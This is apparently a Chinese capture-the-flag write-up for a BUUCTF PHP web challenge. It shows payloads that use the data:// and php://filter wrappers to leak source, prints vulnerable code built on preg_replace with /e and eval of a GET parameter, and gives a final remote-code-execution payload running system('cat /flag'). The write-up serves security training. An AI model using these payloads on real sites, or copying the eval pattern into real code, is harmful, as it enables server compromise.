BUUCTF---web---[BJDCTF2020]ZJCTF,不过如此

1、点开连接,页面出现了提示

传入一个参数text,里面的内容要包括I have a dream。

构造:?/text=I have a dream。发现页面没有显示。这里推测可能得使用伪协议

在文件包含那一行,我们看到了next.php的提示,我们尝试读取文件

根据代码:我们构造payload

/?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

2、页面出现base64编码

3、解码之后得到一串代码

复制代码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

4、分析代码:

定义了一个名为 complex的函数,用于对字符串进行正则替换操作。具体来说,它会将匹配到的字符串转换为小写。

/ei:当作php代码来执行,忽略大小写

定义了一个getFlag函数,将参数cmd中的参数输出

5、由此我们可以构造新payload

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat /flag');

使用正则表达式匹配一个或多个非空白字符(\S*),然后将其赋值给一个变量。

相关推荐
胡哈9 分钟前
React Compiler:让开发者忘掉 memo 这件事
前端·react.js
xiyueyezibile17 分钟前
“自迭代” Skill 的 team-pitfalls 的演进
前端·后端·ai编程
聚美智数23 分钟前
黄历查询-运势查询-国际法定节假日查询-API接口介绍
android·java·数据库
林恒smileZAZ28 分钟前
`Array(100).map(() => 1)` 为什么全为空?
前端·javascript
小巧的砖头1 小时前
C#会重蹈覆辙吗?系列之2:反射及元数据的性能问题
开发语言·前端·c#
KaMeidebaby1 小时前
卡梅德生物技术快报|蛋白的叠氮基修饰:实操解析:核酸模板耦合蛋白的叠氮基修饰实现靶蛋白定点共价标记
前端·人工智能·物联网·算法·百度
濮水大叔1 小时前
在大型 Vue 项目中,如何有效管理复杂的状态?“散装版” vs “套装版”
前端·vue.js·typescript
玄星啊1 小时前
可修改:代码的生存底线
前端·ai编程
私人珍藏库2 小时前
[Android] 一木百宝箱-万能百宝箱+抖音去水印等几百种功能
android·人工智能·app·软件·多功能
没落英雄2 小时前
3. DeepAgents 实战 - Memory Skills 与上下文工程
前端·人工智能·架构